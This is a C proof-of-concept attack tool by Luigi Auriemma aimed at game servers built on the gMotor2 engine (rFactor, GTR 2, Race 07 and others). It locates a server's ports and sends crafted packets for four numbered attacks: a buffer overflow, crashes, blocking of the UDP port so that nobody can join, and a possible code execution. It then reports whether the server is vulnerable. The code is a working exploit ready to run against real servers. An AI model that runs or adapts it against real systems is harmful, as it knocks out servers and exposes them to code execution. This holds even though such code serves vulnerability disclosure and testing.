/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <ctype.h>
#include "show_dump.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stristr strcasestr
#endif



#define VER         "0.1"
#define BUFFSZ      0xffff
#define TPORT       48943
#define TPORT2      34347
#define IPORT       48958
#define IPORT2      34298
#define UPORT       48942
#define UPORT2      34297
//#define RFACTOR_PROTO       // uncomment this line for using the rFactor protocol

typedef uint8_t     u8;
typedef int8_t      i8;
typedef uint16_t    u16;
typedef int16_t     i16;
typedef uint32_t    u32;
typedef int32_t     i32;



int sd_check(struct sockaddr_in *peer, int proto, int type, u8 *buff, int len);
int gmotor2_info(struct sockaddr_in *peer);
int gmotor2_send(int sd, int type, u8 *data, int len);
int gmotor2_recv(int sd, int *type, u8 *buff);
int tcp_recv(int sd, u8 *data, int size);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int putmm(u8 *data, u8 *mem, int len);
int timeout(int sock, int sec);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     err,
            len,
            type,
            attack,
            proto;
    u16     port;
    u8      *buff;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "gMotor2 engine multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 4) {
        printf("\n"
            "Usage: %s <attack> <protocol> <host> [info_port]\n"
            "\n"
            "Attacks:\n"
            " 1 = buffer-overflow or memcpy crash\n"
            " 2 = \"Connection lost\" crash or UDP port blocked (nobody can join the server)\n"
            " 3 = crash/possible code execution\n"
            " 4 = UDP port blocked (nobody can join the server) or server crashed\n"
            "\n"
            "Protocols:\n"
            " t = TCP\n"
            " u = UDP\n"
            "\n"
            "info_port is the UDP port used by the game, by default %hu and %hu\n"
            "you can also use directly the TCP port (useful in case the UDP one is blocked)\n"
            "\n"
            "Note: the presence and the effects of the bugs depend by the target game,\n"
            "      which means that for example RACE07 is vulnerable to attack 1 while BMW\n"
            "      M3 and Race WTCC aren't or require a different exploitation... that's\n"
            "      why this proof-of-concept is so \"generic\"\n"
            "\n"
            "Games which use this engine:\n"
            " F1 Challenge 99-02, rFactor, GT Legends, GTR, GTR 2, RACE, Race 07, BMW M3\n"
            " Challenge and possibly others\n"
            "\n", argv[0], UPORT, UPORT2);
        exit(1);
    }

    attack = atoi(argv[1]);
    proto  = tolower(argv[2][0]);
    if(proto == 't') {
        port = UPORT;
    } else if(proto == 'u') {
        port = UPORT;
    } else {
        printf("\nError: wrong protocol (%s)\n", argv[2]);
        exit(1);
    }

    if(argc > 4) port = atoi(argv[4]);
    peer.sin_addr.s_addr = resolv(argv[3]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    err = gmotor2_info(&peer);
    if(proto == 't') {
        port = TPORT;
        if(err > 0) {
            port = err;
            peer.sin_port = htons(port);
        } else {    // old solution
            if(ntohs(peer.sin_port) == UPORT2) peer.sin_port = htons(TPORT2);
        }
    }

    printf("- start attack %d versus port %hu\n", attack, ntohs(peer.sin_port));

    if(attack == 1) {
        type = 0x80;
        memset(buff,    'A',  255);
        putxx(buff + 6, 0xff, 8);
        len  = 255;

        if(sd_check(&peer, proto, type, buff, len) < 0) std_err();

        printf("- wait some seconds\n");
        sleep(ONESEC);

        printf("- now we query the server for exploiting the bug\n");
        gmotor2_info(&peer);

    } else if(attack == 2) {
        type = 0x30;
        len  = 0;

        if(sd_check(&peer, proto, type, buff, len) < 0) std_err();

    } else if(attack == 3) {
        type = 0x60;
        memset(buff, 'A',    255);
        putxx(buff,  0x1ffb, 16);   // value & 0x1ffb (circa)
        len  = 255;

        if(sd_check(&peer, proto, type, buff, len) < 0) std_err();

    } else if(attack == 4) {
        type = 0x20;
        len  = 0;

        if(sd_check(&peer, proto, type, buff, len) < 0) std_err();

    } else {
        printf("\nError: unexistent attack number\n");
        exit(1);
    }

    printf("- wait some seconds\n");
    sleep(ONESEC * 3);

    printf("- now I check if the server is still online:\n");
    if(attack == 4) {
        err = gmotor2_info(&peer);
    } else {
        type   = 0x40;
        memset(buff, 0, 16);
        len    = 16;
        err = sd_check(&peer, proto, type, buff, len);
    }

    if(err < 0) {
        printf("\n  Server IS vulnerable!!!\n");
    } else {
        printf("\n  Server is not vulnerable\n");
    }

    return(0);
}



int sd_check(struct sockaddr_in *peer, int proto, int type, u8 *buff, int len) {
    int     sd;

    if(proto == 't') {
        printf("- use TCP protocol\n");
        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    } else {
        printf("- use UDP protocol\n");
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    }
    if(sd < 0) std_err();

    if(connect(sd, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
      < 0) return(-1);

    if(gmotor2_send(sd, type, buff, len) < 0) return(-1);
    if(timeout(sd, 3) > 0) {
        len = gmotor2_recv(sd, &type, buff);
    }

    close(sd);
    return(0);
}



void fgetz(u8 *buff, int size) {
    u8      *p;

    fgets(buff, size, stdin);
    for(p = buff; *p && (*p != '\n') && (*p != '\r'); p++);
    *p = 0;
}



int gmotor2_info(struct sockaddr_in *peer) {
    int     sd,
            i,
            len,
            new_port,
            replies;
    u16     port_bck;
    u8      gamename[64],
            buff[4096],
            *p,
            *l;

    replies     = 0;
    gamename[0] = 0;
    new_port    = -1;
    port_bck    = ntohs(peer->sin_port);
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    for(i = 0; i < 3; i++) {
        printf("- query %s:%hu for info\n",
            inet_ntoa(peer->sin_addr), ntohs(peer->sin_port));

        switch(i) {
            case 0: peer->sin_port = htons(ntohs(peer->sin_port) - 16); break;
            case 1: peer->sin_port = htons(IPORT);  break;
            case 2: peer->sin_port = htons(IPORT2); break;
        }
        len = sprintf(buff, "GTR2_Direct_IP_Search") + 1;
        len = send_recv(sd, buff, len, buff, sizeof(buff), peer, 0);
        if(len > 0) {
            replies++;
            show_dump(buff, len, stdout);
            break;
        }
    }

    peer->sin_port = htons(port_bck);
redo:
    printf("- query %s:%hu for TCP port\n",
        inet_ntoa(peer->sin_addr), ntohs(peer->sin_port));

    for(i = 0; i < 2; i++) {
        len = sprintf(buff, "<<HPWsock>> TCPReq%s", gamename);
        printf("  %s\n", buff);
        len = send_recv(sd, buff, len, buff, sizeof(buff), peer, 0);
        if(len > 0) {
            replies++;
            if(buff[0] == '\\') {
                strcpy(gamename, "F1 Challenge 99-02");
                peer->sin_port = htons(ntohs(peer->sin_port) + 100);
                printf("- change port\n");
                continue;
            }

            p = (u8 *)stristr(buff, "TCPDeny");
            if(p) {
                p = strchr(buff, '(');
                if(!p || (i == 2)) {
                    printf("\nError: wrong reply from server:\n  %.*s\n", len, buff);
                    exit(1);
                }
                l = strchr(p + 1, ')');
                if(!l) l = buff + len;
                *l = 0;
                sprintf(gamename, "%.*s", sizeof(gamename), p + 1);
                continue;
            }
            printf("  %.*s\n", len, buff);
            p = (u8 *)stristr(buff, "TCPInfo ");
            if(p) new_port = atoi(p + 8);
            break;
        }
    }
    if(new_port < 0) {
        if(ntohs(peer->sin_port) == UPORT) {
            peer->sin_port = htons(UPORT2);
            goto redo;
        }
    }

    close(sd);

    if(!replies) {
        printf("\nError: no reply received, probably the server is offline\n");
        exit(1);
    }
    return(new_port);
}



int gmotor2_send(int sd, int type, u8 *data, int len) {
    u8      tb[8],
            *p;

    p = tb;
#ifdef RFACTOR_PROTO
    p += putxx(p, len,  8);
    p += putxx(p, type, 8);
#else
    p += putxx(p, 4,    16);
    p += putxx(p, len,  16);
    p += putxx(p, type | 0x0ffff600, 32);   // seq/ack/frame???
#endif
    send(sd, tb, p - tb, 0);
    return(send(sd, data, len, 0));
}



int gmotor2_recv(int sd, int *type, u8 *buff) {
    u32     len;
    u8      tb[8];

#ifdef RFACTOR_PROTO
    if(tcp_recv(sd, tb, 2) < 0) return(-1);
    len   = tb[0];
    *type = tb[1];
#else
    if(tcp_recv(sd, tb, 8) < 0) return(-1);
    len   = tb[2] | (tb[3] << 8);
    *type = tb[4];
#endif

    if(tcp_recv(sd, buff, len) < 0) return(-1);
    return(len);
}



int tcp_recv(int sd, u8 *data, int size) {
    int     t;

    while(size) {
        t = recv(sd, data, size, 0);
        if(t <= 0) return(-1);
        data += t;
        size -= t;
    }
    return(0);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry,
            len;

    if(in && !out) {
        if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
          < 0) goto quit;
        return(0);
    }
    if(in) {
        for(retry = 2; retry; retry--) {
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) goto quit;
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            if(!err) return(-1);
            printf("\nError: socket timeout, no reply received\n\n");
            exit(1);
        }
    } else {
        if(timeout(sd, 3) < 0) return(-1);
    }

    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) goto quit;
    return(len);
quit:
    if(err) std_err();
    return(-1);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    bytes = bits >> 3;

    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << (i << 3));
    }

    *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;

    for(i = 0; i < bytes; i++) {
        data[i] = (num >> (i << 3)) & 0xff;
    }

    return(bytes);
}



int putmm(u8 *data, u8 *mem, int len) {
    memcpy(data, mem, len);
    return(len);
}



int timeout(int sock, int sec) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = sec;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


